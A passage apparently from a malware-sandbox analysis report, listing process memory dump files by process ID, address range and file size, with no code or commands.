memory/5532-691-0x00000000055D0000-0x00000000055D1000-memory.dmpFilesize
4KB
-
memory/5532-716-0x00000000055D4000-0x00000000055D6000-memory.dmpFilesize
8KB
-
memory/5532-677-0x00000000001C0000-0x00000000001EF000-memory.dmpFilesize
188KB
-
memory/5532-680-0x0000000000400000-0x0000000001024000-memory.dmpFilesize
12.1MB
-
memory/5532-685-0x00000000055D2000-0x00000000055D3000-memory.dmpFilesize
4KB
-
memory/5588-608-0x0000000004B00000-0x0000000004B01000-memory.dmpFilesize
4KB
-
memory/5608-596-0x0000000004E30000-0x0000000004E31000-memory.dmpFilesize
4KB
-
memory/5676-604-0x00000000023A0000-0x00000000023A1000-memory.dmpFilesize
4KB
-
memory/5732-664-0x0000000004C00000-0x0000000004CAC000-memory.dmpFilesize
688KB
-
memory/5732-661-0x0000000004AA0000-0x0000000004B4D000-memory.dmpFilesize
692KB
-
memory/5920-627-0x0000000005190000-0x0000000005191000-memory.dmpFilesize
4KB
-
memory/5944-695-0x00000000091B0000-0x00000000097B6000-memory.dmpFilesize
6.0MB
-
memory/6048-809-0x0000022E2D050000-0x0000022E2D270000-memory.dmpFilesize
2.1MB
-
memory/6048-845-0x0000022E479C3000-0x0000022E479C5000-memory.dmpFilesize
8KB
-
memory/6048-851-0x0000022E479C6000-0x0000022E479C7000-memory.dmpFilesize
4KB